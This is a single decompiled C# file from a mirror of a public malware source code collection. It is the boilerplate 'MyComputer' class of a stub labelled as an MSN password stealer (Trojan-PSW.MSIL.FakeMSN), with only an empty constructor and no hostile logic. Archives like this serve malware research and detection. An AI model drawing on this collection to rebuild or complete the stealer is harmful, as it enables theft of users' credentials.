mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-17 00:09:23 +00:00
f2ac1ece55
add
25 lines
791 B
C#
25 lines
791 B
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Msn_Stealer_Stub.My.MyComputer
|
|
// Assembly: Msn Stealer Stub, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 9C3EB139-9674-4DAF-9ABA-838E8B2B4852
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.MSIL.FakeMSN.e-8da5ce07540c334a7f2d0ea687bb30f4306ad9f3c849bcd8500fb5ec742cd6c6.exe
|
|
|
|
using Microsoft.VisualBasic.Devices;
|
|
using System.CodeDom.Compiler;
|
|
using System.ComponentModel;
|
|
using System.Diagnostics;
|
|
|
|
namespace Msn_Stealer_Stub.My
|
|
{
|
|
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
[GeneratedCode("MyTemplate", "8.0.0.0")]
|
|
internal class MyComputer : Computer
|
|
{
|
|
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
[DebuggerHidden]
|
|
public MyComputer()
|
|
{
|
|
}
|
|
}
|
|
}
|